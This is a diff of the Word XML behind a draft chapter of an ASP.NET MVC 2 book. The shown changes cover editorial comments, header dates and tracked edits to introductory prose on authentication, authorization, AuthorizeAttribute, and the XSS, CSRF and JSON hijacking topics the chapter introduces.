+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>What are the other techniques?</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="16" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
+  <w:comment w:id="28" w:author="Jeffrey" w:date="2010-02-18T16:09:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Added "this technique"</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="29" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6218,11 +4716,20 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Make sure all the code listing titles are more descriptive.</w:t>
+        <w:t xml:space="preserve">“We explored </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>them</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> using…”</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="17" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
+  <w:comment w:id="30" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6234,83 +4741,17 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>There’s a lot going on in the listing above. Does this need a bit more explanation?</w:t>
+        <w:t xml:space="preserve"> “…and to HTML encode all…”</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="18" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
+  <w:comment w:id="31" w:author="Jeffrey" w:date="2010-02-18T16:10:00Z" w:initials="J">
+    <w:p>
+      <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>This is a much better listing title.</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="19" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t>What are the other techniques?</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="20" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">“We explored </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>them</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> using…”</w:t>
-      </w:r>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="21" w:author="Katharine Osborne" w:date="2010-02-06T23:59:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> “…and to HTML encode </w:t>
-      </w:r>
-      <w:r>
-        <w:t>all…”</w:t>
+        <w:t>Changed it.  Thanks</w:t>
       </w:r>
     </w:p>
   </w:comment>
@@ -6318,7 +4759,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:endnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:r>
@@ -6339,7 +4780,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -6369,7 +4810,7 @@
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -6399,7 +4840,7 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:r>
       <w:pgNum/>
@@ -6409,7 +4850,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:footnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:r>
@@ -6430,7 +4871,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -6444,7 +4885,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t>16</w:t>
       </w:r>
     </w:fldSimple>
     <w:r>
@@ -6477,7 +4918,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1/12/2010</w:t>
+        <w:t>2/7/2010</w:t>
       </w:r>
     </w:fldSimple>
   </w:p>
@@ -6485,7 +4926,7 @@
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Body1"/>
@@ -6503,7 +4944,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1/12/2010</w:t>
+        <w:t>2/7/2010</w:t>
       </w:r>
     </w:fldSimple>
     <w:r>
@@ -6532,7 +4973,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t>1</w:t>
+        <w:t>17</w:t>
       </w:r>
     </w:fldSimple>
   </w:p>
@@ -6540,7 +4981,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:numbering xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="FFFFFF7C"/>
     <w:multiLevelType w:val="singleLevel"/>
@@ -8328,7 +6769,7 @@
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="276">
+  <w:latentStyles w:defLockedState="1" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="267">
     <w:lsdException w:name="Normal" w:locked="0"/>
     <w:lsdException w:name="heading 1" w:locked="0"/>
     <w:lsdException w:name="heading 3" w:locked="0"/>
@@ -8653,11 +7094,13 @@
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
@@ -8673,6 +7116,7 @@
   </w:style>
   <w:style w:type="numbering" w:default="1" w:styleId="NoList">
     <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
@@ -10561,7 +9005,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2FB41B-03D4-394E-8892-3506BE08EE17}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4EB9A61A-6CDE-484B-AF6B-D7DF945DD187}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/manuscript/Chapter11/MVC2iA_CH_11.docx
+++ b/manuscript/Chapter11/MVC2iA_CH_11.docx
@@ -44,7 +44,6 @@
       <w:r>
         <w:t>Preventing</w:t>
       </w:r>
-      <w:commentRangeStart w:id="0"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -77,19 +76,11 @@
         <w:t>ijacking</w:t>
       </w:r>
     </w:p>
-    <w:commentRangeEnd w:id="0"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="0"/>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve">Security is often a vague an amorphous topic in web application development.  We rely on the web server to keep our application secure, and we rely on our programming platform.  The rest sometimes seems very theoretical and rare.  In this chapter, we will show real possible attacks and exactly what to do to prevent them by using two main </w:t>
       </w:r>
       <w:r>
@@ -110,136 +101,174 @@
       <w:r>
         <w:t>he</w:t>
       </w:r>
-      <w:commentRangeStart w:id="1"/>
+      <w:r>
+        <w:t xml:space="preserve"> is authenticated.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Italics"/>
+        </w:rPr>
+        <w:t>Authorization</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> he</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> has been specifically authorized to do so.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The second aspect we'll discuss involve</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There are several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">11.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Authentication and a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>uthorization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>ASP.NET MVC 2 ships with a filter attribute</w:t>
+      </w:r>
+      <w:ins w:id="0" w:author="JSkinner" w:date="2010-03-02T18:35:00Z">
+        <w:r>
+          <w:t>,</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:ins w:id="1" w:author="JSkinner" w:date="2010-03-02T18:35:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:t>,</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to restrict access to them</w:t>
+      </w:r>
       <w:commentRangeStart w:id="2"/>
       <w:r>
-        <w:t xml:space="preserve"> is authenticated.  </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="1"/>
-      </w:r>
-      <w:commentRangeEnd w:id="2"/>
-      <w:r>
-        <w:commentReference w:id="2"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Italics"/>
-        </w:rPr>
-        <w:t>Authorization</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users</w:t>
-      </w:r>
-      <w:commentRangeStart w:id="3"/>
-      <w:commentRangeStart w:id="4"/>
-      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:del w:id="3" w:author="JSkinner" w:date="2010-03-02T18:37:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:delText>AuthorizeAttribute</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText xml:space="preserve"> short-circuits the normal response.  </w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t xml:space="preserve">If the </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>user is not permitted</w:t>
+      </w:r>
+      <w:ins w:id="4" w:author="JSkinner" w:date="2010-03-02T18:35:00Z">
+        <w:r>
+          <w:t xml:space="preserve"> to access the action then the</w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="5" w:author="JSkinner" w:date="2010-03-02T18:35:00Z">
+        <w:r>
+          <w:delText>,</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will transmit </w:t>
+      </w:r>
+      <w:del w:id="6" w:author="JSkinner" w:date="2010-03-02T18:36:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">to the browser </w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t xml:space="preserve">an HTTP status code of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Unauthorized</w:t>
+      </w:r>
+      <w:ins w:id="7" w:author="JSkinner" w:date="2010-03-02T18:36:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="CodeinText"/>
+            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+            <w:color w:val="000000"/>
+            <w:sz w:val="16"/>
+          </w:rPr>
+          <w:t>to the browser</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> he</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> has been specifically authorized to do so.</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="3"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="3"/>
-      </w:r>
-      <w:commentRangeEnd w:id="4"/>
-      <w:r>
-        <w:commentReference w:id="4"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The second aspect we'll discuss involve</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There are several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Authentication and a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>uthorization</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">ASP.NET MVC 2 ships with a filter attribute </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to restrict access to them.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> short-circuits the normal response.  If the </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">user is not permitted, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> will transmit to the browser an HTTP status code of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>401</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Unauthorized,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -253,6 +282,10 @@
       <w:r>
         <w:t xml:space="preserve">.  </w:t>
       </w:r>
+      <w:commentRangeEnd w:id="2"/>
+      <w:r>
+        <w:commentReference w:id="2"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">Applications using ASP.NET's forms authentication mechanism </w:t>
       </w:r>
@@ -285,7 +318,21 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>The simplest use of the AuthorizeAttribute</w:t>
+        <w:t xml:space="preserve">The simplest use of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+          <w:rPrChange w:id="8" w:author="JSkinner" w:date="2010-03-02T18:38:00Z">
+            <w:rPr>
+              <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+              <w:color w:val="auto"/>
+              <w:sz w:val="18"/>
+              <w:szCs w:val="20"/>
+            </w:rPr>
+          </w:rPrChange>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
       </w:r>
       <w:r>
         <w:t>, shown in listing 11.1,</w:t>
@@ -404,7 +451,6 @@
       <w:r>
